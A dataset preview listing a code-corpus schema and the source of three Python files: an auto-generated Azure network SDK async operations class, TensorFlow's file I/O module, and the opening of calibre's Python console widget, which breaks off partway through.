Dataset preview: column schema (name, dtype, observed range)

- repo_name: string, lengths 5-100
- path: string, lengths 4-299
- copies: string, 990 classes
- size: string, lengths 4-7
- content: string, lengths 666-1.03M
- license: string, 15 classes
- hash: int64, -9,223,351,895,964,839,000 to 9,223,297,778B
- line_mean: float64, 3.17-100
- line_max: int64, 7-1k
- alpha_frac: float64, 0.25-0.98
- autogenerated: bool, 1 class

repo_name | path | copies | size | content | license | hash | line_mean | line_max | alpha_frac | autogenerated
---|---|---|---|---|---|---|---|---|---|---
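The rows that follow are raw dumps of the `content` column for a handful of source files. As a hedged illustration of how this schema might be consumed (the dataset identifier, split name, and availability through the Hugging Face `datasets` library are assumptions, not stated anywhere above), a filtering pass could look like:

```python
# Sketch only: the dataset name and split below are placeholders, not taken from this dump.
from datasets import load_dataset

ds = load_dataset("example-org/python-code-dump", split="train")  # hypothetical identifier

# Keep rows flagged as human-written, using the stats columns described in the schema above.
keep = ds.filter(
    lambda row: not row["autogenerated"]
    and row["alpha_frac"] >= 0.25
    and row["line_max"] <= 1000
)
print(keep[0]["repo_name"], keep[0]["path"], keep[0]["license"])
```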
Azure/azure-sdk-for-python | sdk/network/azure-mgmt-network/azure/mgmt/network/v2018_10_01/aio/operations/_interface_endpoints_operations.py | 1 | 23817 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar, Union
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.core.polling import AsyncLROPoller, AsyncNoPolling, AsyncPollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.async_arm_polling import AsyncARMPolling
from ... import models as _models
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class InterfaceEndpointsOperations:
"""InterfaceEndpointsOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.network.v2018_10_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
async def _delete_initial(
self,
resource_group_name: str,
interface_endpoint_name: str,
**kwargs
) -> None:
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-10-01"
# Construct URL
url = self._delete_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'interfaceEndpointName': self._serialize.url("interface_endpoint_name", interface_endpoint_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/interfaceEndpoints/{interfaceEndpointName}'} # type: ignore
async def begin_delete(
self,
resource_group_name: str,
interface_endpoint_name: str,
**kwargs
) -> AsyncLROPoller[None]:
"""Deletes the specified interface endpoint.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param interface_endpoint_name: The name of the interface endpoint.
:type interface_endpoint_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: Pass in True if you'd like the AsyncARMPolling polling method,
False for no polling, or your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._delete_initial(
resource_group_name=resource_group_name,
interface_endpoint_name=interface_endpoint_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'interfaceEndpointName': self._serialize.url("interface_endpoint_name", interface_endpoint_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = AsyncARMPolling(lro_delay, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/interfaceEndpoints/{interfaceEndpointName}'} # type: ignore
async def get(
self,
resource_group_name: str,
interface_endpoint_name: str,
expand: Optional[str] = None,
**kwargs
) -> "_models.InterfaceEndpoint":
"""Gets the specified interface endpoint by resource group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param interface_endpoint_name: The name of the interface endpoint.
:type interface_endpoint_name: str
:param expand: Expands referenced resources.
:type expand: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: InterfaceEndpoint, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2018_10_01.models.InterfaceEndpoint
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.InterfaceEndpoint"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-10-01"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'interfaceEndpointName': self._serialize.url("interface_endpoint_name", interface_endpoint_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('InterfaceEndpoint', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/interfaceEndpoints/{interfaceEndpointName}'} # type: ignore
async def _create_or_update_initial(
self,
resource_group_name: str,
interface_endpoint_name: str,
parameters: "_models.InterfaceEndpoint",
**kwargs
) -> "_models.InterfaceEndpoint":
cls = kwargs.pop('cls', None) # type: ClsType["_models.InterfaceEndpoint"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-10-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self._create_or_update_initial.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'interfaceEndpointName': self._serialize.url("interface_endpoint_name", interface_endpoint_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'InterfaceEndpoint')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('InterfaceEndpoint', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('InterfaceEndpoint', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_create_or_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/interfaceEndpoints/{interfaceEndpointName}'} # type: ignore
async def begin_create_or_update(
self,
resource_group_name: str,
interface_endpoint_name: str,
parameters: "_models.InterfaceEndpoint",
**kwargs
) -> AsyncLROPoller["_models.InterfaceEndpoint"]:
"""Creates or updates an interface endpoint in the specified resource group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param interface_endpoint_name: The name of the interface endpoint.
:type interface_endpoint_name: str
:param parameters: Parameters supplied to the create or update interface endpoint operation.
:type parameters: ~azure.mgmt.network.v2018_10_01.models.InterfaceEndpoint
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: Pass in True if you'd like the AsyncARMPolling polling method,
False for no polling, or your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either InterfaceEndpoint or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[~azure.mgmt.network.v2018_10_01.models.InterfaceEndpoint]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.InterfaceEndpoint"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._create_or_update_initial(
resource_group_name=resource_group_name,
interface_endpoint_name=interface_endpoint_name,
parameters=parameters,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('InterfaceEndpoint', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'interfaceEndpointName': self._serialize.url("interface_endpoint_name", interface_endpoint_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
if polling is True: polling_method = AsyncARMPolling(lro_delay, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/interfaceEndpoints/{interfaceEndpointName}'} # type: ignore
def list(
self,
resource_group_name: str,
**kwargs
) -> AsyncIterable["_models.InterfaceEndpointListResult"]:
"""Gets all interface endpoints in a resource group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either InterfaceEndpointListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.network.v2018_10_01.models.InterfaceEndpointListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.InterfaceEndpointListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-10-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('InterfaceEndpointListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/interfaceEndpoints'} # type: ignore
def list_by_subscription(
self,
**kwargs
) -> AsyncIterable["_models.InterfaceEndpointListResult"]:
"""Gets all interface endpoints in a subscription.
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either InterfaceEndpointListResult or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.network.v2018_10_01.models.InterfaceEndpointListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.InterfaceEndpointListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-10-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_by_subscription.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('InterfaceEndpointListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_by_subscription.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Network/interfaceEndpoints'} # type: ignore
| mit | -8,307,013,246,436,605,000 | 48.930818 | 205 | 0.647941 | false |
yaroslavvb/tensorflow | tensorflow/python/lib/io/file_io.py | 23 | 14674 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""File IO methods that wrap the C++ FileSystem API.
The C++ FileSystem API is SWIG wrapped in file_io.i. These functions call those
to accomplish basic File IO operations.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import uuid
from tensorflow.python import pywrap_tensorflow
from tensorflow.python.framework import errors
from tensorflow.python.util import compat
class FileIO(object):
"""FileIO class that exposes methods to read / write to / from files.
The constructor takes the following arguments:
name: name of the file
mode: one of 'r', 'w', 'a', 'r+', 'w+', 'a+'. Append 'b' for bytes mode.
Can be used as an iterator to iterate over lines in the file.
The default buffer size used for the BufferedInputStream used for reading
the file line by line is 1024 * 512 bytes.
"""
def __init__(self, name, mode):
self.__name = name
self.__mode = mode
self._read_buf = None
self._writable_file = None
self._binary_mode = "b" in mode
mode = mode.replace("b", "")
if mode not in ("r", "w", "a", "r+", "w+", "a+"):
raise errors.InvalidArgumentError(
None, None, "mode is not 'r' or 'w' or 'a' or 'r+' or 'w+' or 'a+'")
self._read_check_passed = mode in ("r", "r+", "a+", "w+")
self._write_check_passed = mode in ("a", "w", "r+", "a+", "w+")
@property
def name(self):
"""Returns the file name."""
return self.__name
@property
def mode(self):
"""Returns the mode in which the file was opened."""
return self.__mode
def _preread_check(self):
if not self._read_buf:
if not self._read_check_passed:
raise errors.PermissionDeniedError(None, None,
"File isn't open for reading")
with errors.raise_exception_on_not_ok_status() as status:
self._read_buf = pywrap_tensorflow.CreateBufferedInputStream(
compat.as_bytes(self.__name), 1024 * 512, status)
def _prewrite_check(self):
if not self._writable_file:
if not self._write_check_passed:
raise errors.PermissionDeniedError(None, None,
"File isn't open for writing")
with errors.raise_exception_on_not_ok_status() as status:
self._writable_file = pywrap_tensorflow.CreateWritableFile(
compat.as_bytes(self.__name), compat.as_bytes(self.__mode), status)
def _prepare_value(self, val):
if self._binary_mode:
return compat.as_bytes(val)
else:
return compat.as_str_any(val)
def size(self):
"""Returns the size of the file."""
return stat(self.__name).length
def write(self, file_content):
"""Writes file_content to the file. Appends to the end of the file."""
self._prewrite_check()
with errors.raise_exception_on_not_ok_status() as status:
pywrap_tensorflow.AppendToFile(
compat.as_bytes(file_content), self._writable_file, status)
def read(self, n=-1):
"""Returns the contents of a file as a string.
Starts reading from current position in file.
Args:
n: Read 'n' bytes if n != -1. If n = -1, reads to end of file.
Returns:
'n' bytes of the file (or whole file) in bytes mode or 'n' bytes of the
string if in string (regular) mode.
"""
self._preread_check()
with errors.raise_exception_on_not_ok_status() as status:
if n == -1:
length = self.size() - self.tell()
else:
length = n
return self._prepare_value(
pywrap_tensorflow.ReadFromStream(self._read_buf, length, status))
def seek(self, position):
"""Seeks to the position in the file."""
self._preread_check()
with errors.raise_exception_on_not_ok_status() as status:
ret_status = self._read_buf.Seek(position)
pywrap_tensorflow.Set_TF_Status_from_Status(status, ret_status)
def readline(self):
r"""Reads the next line from the file. Leaves the '\n' at the end."""
self._preread_check()
return self._prepare_value(self._read_buf.ReadLineAsString())
def readlines(self):
"""Returns all lines from the file in a list."""
self._preread_check()
lines = []
while True:
s = self.readline()
if not s:
break
lines.append(s)
return lines
def tell(self):
"""Returns the current position in the file."""
self._preread_check()
return self._read_buf.Tell()
def __enter__(self):
"""Make usable with "with" statement."""
return self
def __exit__(self, unused_type, unused_value, unused_traceback):
"""Make usable with "with" statement."""
self.close()
def __iter__(self):
return self
def next(self):
retval = self.readline()
if not retval:
raise StopIteration()
return retval
def __next__(self):
return self.next()
def flush(self):
"""Flushes the Writable file.
This only ensures that the data has made its way out of the process without
any guarantees on whether it's written to disk. This means that the
data would survive an application crash but not necessarily an OS crash.
"""
if self._writable_file:
with errors.raise_exception_on_not_ok_status() as status:
ret_status = self._writable_file.Flush()
pywrap_tensorflow.Set_TF_Status_from_Status(status, ret_status)
def close(self):
"""Closes FileIO. Should be called for the WritableFile to be flushed."""
self._read_buf = None
if self._writable_file:
with errors.raise_exception_on_not_ok_status() as status:
ret_status = self._writable_file.Close()
pywrap_tensorflow.Set_TF_Status_from_Status(status, ret_status)
self._writable_file = None
def file_exists(filename):
"""Determines whether a path exists or not.
Args:
filename: string, a path
Returns:
True if the path exists, whether its a file or a directory.
False if the path does not exist and there are no filesystem errors.
Raises:
errors.OpError: Propagates any errors reported by the FileSystem API.
"""
try:
with errors.raise_exception_on_not_ok_status() as status:
pywrap_tensorflow.FileExists(compat.as_bytes(filename), status)
except errors.NotFoundError:
return False
return True
def delete_file(filename):
"""Deletes the file located at 'filename'.
Args:
filename: string, a filename
Raises:
errors.OpError: Propagates any errors reported by the FileSystem API. E.g.,
NotFoundError if the file does not exist.
"""
with errors.raise_exception_on_not_ok_status() as status:
pywrap_tensorflow.DeleteFile(compat.as_bytes(filename), status)
def read_file_to_string(filename, binary_mode=False):
"""Reads the entire contents of a file to a string.
Args:
filename: string, path to a file
binary_mode: whether to open the file in binary mode or not. This changes
the type of the object returned.
Returns:
contents of the file as a string or bytes.
Raises:
errors.OpError: Raises variety of errors that are subtypes e.g.
NotFoundError etc.
"""
if binary_mode:
f = FileIO(filename, mode="rb")
else:
f = FileIO(filename, mode="r")
return f.read()
def write_string_to_file(filename, file_content):
"""Writes a string to a given file.
Args:
filename: string, path to a file
file_content: string, contents that need to be written to the file
Raises:
errors.OpError: If there are errors during the operation.
"""
with FileIO(filename, mode="w") as f:
f.write(file_content)
def get_matching_files(filename):
"""Returns a list of files that match the given pattern.
Args:
filename: string, the pattern
Returns:
Returns a list of strings containing filenames that match the given pattern.
Raises:
errors.OpError: If there are filesystem / directory listing errors.
"""
with errors.raise_exception_on_not_ok_status() as status:
# Convert each element to string, since the return values of the
# vector of string should be interpreted as strings, not bytes.
return [compat.as_str_any(matching_filename)
for matching_filename in pywrap_tensorflow.GetMatchingFiles(
compat.as_bytes(filename), status)]
def create_dir(dirname):
"""Creates a directory with the name 'dirname'.
Args:
dirname: string, name of the directory to be created
Notes:
The parent directories need to exist. Use recursive_create_dir instead if
there is the possibility that the parent dirs don't exist.
Raises:
errors.OpError: If the operation fails.
"""
with errors.raise_exception_on_not_ok_status() as status:
pywrap_tensorflow.CreateDir(compat.as_bytes(dirname), status)
def recursive_create_dir(dirname):
"""Creates a directory and all parent/intermediate directories.
It succeeds if dirname already exists and is writable.
Args:
dirname: string, name of the directory to be created
Raises:
errors.OpError: If the operation fails.
"""
with errors.raise_exception_on_not_ok_status() as status:
pywrap_tensorflow.RecursivelyCreateDir(compat.as_bytes(dirname), status)
def copy(oldpath, newpath, overwrite=False):
"""Copies data from oldpath to newpath.
Args:
oldpath: string, name of the file whose contents need to be copied
newpath: string, name of the file to which to copy to
overwrite: boolean, if false, it's an error for newpath to be occupied by an
existing file.
Raises:
errors.OpError: If the operation fails.
"""
with errors.raise_exception_on_not_ok_status() as status:
pywrap_tensorflow.CopyFile(
compat.as_bytes(oldpath), compat.as_bytes(newpath), overwrite, status)
def rename(oldname, newname, overwrite=False):
"""Rename or move a file / directory.
Args:
oldname: string, pathname for a file
newname: string, pathname to which the file needs to be moved
overwrite: boolean, if false, it's an error for newpath to be occupied by an
existing file.
Raises:
errors.OpError: If the operation fails.
"""
with errors.raise_exception_on_not_ok_status() as status:
pywrap_tensorflow.RenameFile(
compat.as_bytes(oldname), compat.as_bytes(newname), overwrite, status)
def atomic_write_string_to_file(filename, contents):
"""Writes to `filename` atomically.
This means that when `filename` appears in the filesystem, it will contain
all of `contents`. With write_string_to_file, it is possible for the file
to appear in the filesystem with `contents` only partially written.
Accomplished by writing to a temp file and then renaming it.
Args:
filename: string, pathname for a file
contents: string, contents that need to be written to the file
"""
temp_pathname = filename + ".tmp" + uuid.uuid4().hex
write_string_to_file(temp_pathname, contents)
rename(temp_pathname, filename, overwrite=True)
def delete_recursively(dirname):
"""Deletes everything under dirname recursively.
Args:
dirname: string, a path to a directory
Raises:
errors.OpError: If the operation fails.
"""
with errors.raise_exception_on_not_ok_status() as status:
pywrap_tensorflow.DeleteRecursively(compat.as_bytes(dirname), status)
def is_directory(dirname):
"""Returns whether the path is a directory or not.
Args:
dirname: string, path to a potential directory
Returns:
True, if the path is a directory; False otherwise
"""
try:
status = pywrap_tensorflow.TF_NewStatus()
return pywrap_tensorflow.IsDirectory(compat.as_bytes(dirname), status)
finally:
pywrap_tensorflow.TF_DeleteStatus(status)
def list_directory(dirname):
"""Returns a list of entries contained within a directory.
The list is in arbitrary order. It does not contain the special entries "."
and "..".
Args:
dirname: string, path to a directory
Returns:
[filename1, filename2, ... filenameN] as strings
Raises:
errors.NotFoundError if directory doesn't exist
"""
if not is_directory(dirname):
raise errors.NotFoundError(None, None, "Could not find directory")
with errors.raise_exception_on_not_ok_status() as status:
# Convert each element to string, since the return values of the
# vector of string should be interpreted as strings, not bytes.
return [
compat.as_str_any(filename)
for filename in pywrap_tensorflow.GetChildren(
compat.as_bytes(dirname), status)
]
def walk(top, in_order=True):
"""Recursive directory tree generator for directories.
Args:
top: string, a Directory name
in_order: bool, Traverse in order if True, post order if False.
Errors that happen while listing directories are ignored.
Yields:
Each yield is a 3-tuple: the pathname of a directory, followed by lists of
all its subdirectories and leaf files.
(dirname, [subdirname, subdirname, ...], [filename, filename, ...])
as strings
"""
top = compat.as_str_any(top)
try:
listing = list_directory(top)
except errors.NotFoundError:
return
files = []
subdirs = []
for item in listing:
full_path = os.path.join(top, item)
if is_directory(full_path):
subdirs.append(item)
else:
files.append(item)
here = (top, subdirs, files)
if in_order:
yield here
for subdir in subdirs:
for subitem in walk(os.path.join(top, subdir), in_order):
yield subitem
if not in_order:
yield here
def stat(filename):
"""Returns file statistics for a given path.
Args:
filename: string, path to a file
Returns:
FileStatistics struct that contains information about the path
Raises:
errors.OpError: If the operation fails.
"""
file_statistics = pywrap_tensorflow.FileStatistics()
with errors.raise_exception_on_not_ok_status() as status:
pywrap_tensorflow.Stat(compat.as_bytes(filename), file_statistics, status)
return file_statistics
| apache-2.0 | 449,743,245,204,139,200 | 29.380952 | 80 | 0.676775 | false |
kobolabs/calibre | src/calibre/utils/pyconsole/console.py | 9 | 16915 | #!/usr/bin/env python
# vim:fileencoding=UTF-8:ts=4:sw=4:sta:et:sts=4:ai
__license__ = 'GPL v3'
__copyright__ = '2010, Kovid Goyal <[email protected]>'
__docformat__ = 'restructuredtext en'
import sys, textwrap, traceback, StringIO
from functools import partial
from codeop import CommandCompiler
from PyQt4.Qt import QTextEdit, Qt, QTextFrameFormat, pyqtSignal, \
QApplication, QColor, QPalette, QMenu, QActionGroup, QTimer
from pygments.lexers import PythonLexer, PythonTracebackLexer
from pygments.styles import get_all_styles
from calibre.utils.pyconsole.formatter import Formatter
from calibre.utils.pyconsole.controller import Controller
from calibre.utils.pyconsole.history import History
from calibre.utils.pyconsole import prints, prefs, __appname__, \
__version__, error_dialog, dynamic
class EditBlock(object): # {{{
def __init__(self, cursor):
self.cursor = cursor
def __enter__(self):
self.cursor.beginEditBlock()
return self.cursor
def __exit__(self, *args):
self.cursor.endEditBlock()
# }}}
class Prepender(object): # {{{
'Helper class to insert output before the current prompt'
def __init__(self, console):
self.console = console
def __enter__(self):
c = self.console
self.opos = c.cursor_pos
cur = c.prompt_frame.firstCursorPosition()
cur.movePosition(cur.PreviousCharacter)
c.setTextCursor(cur)
def __exit__(self, *args):
self.console.cursor_pos = self.opos
# }}}
class ThemeMenu(QMenu): # {{{
def __init__(self, parent):
QMenu.__init__(self, _('Choose theme (needs restart)'))
parent.addMenu(self)
self.group = QActionGroup(self)
current = prefs['theme']
alls = list(sorted(get_all_styles()))
if current not in alls:
current = prefs['theme'] = 'default'
self.actions = []
for style in alls:
ac = self.group.addAction(style)
ac.setCheckable(True)
if current == style:
ac.setChecked(True)
self.actions.append(ac)
ac.triggered.connect(partial(self.set_theme, style))
self.addAction(ac)
def set_theme(self, style, *args):
prefs['theme'] = style
# }}}
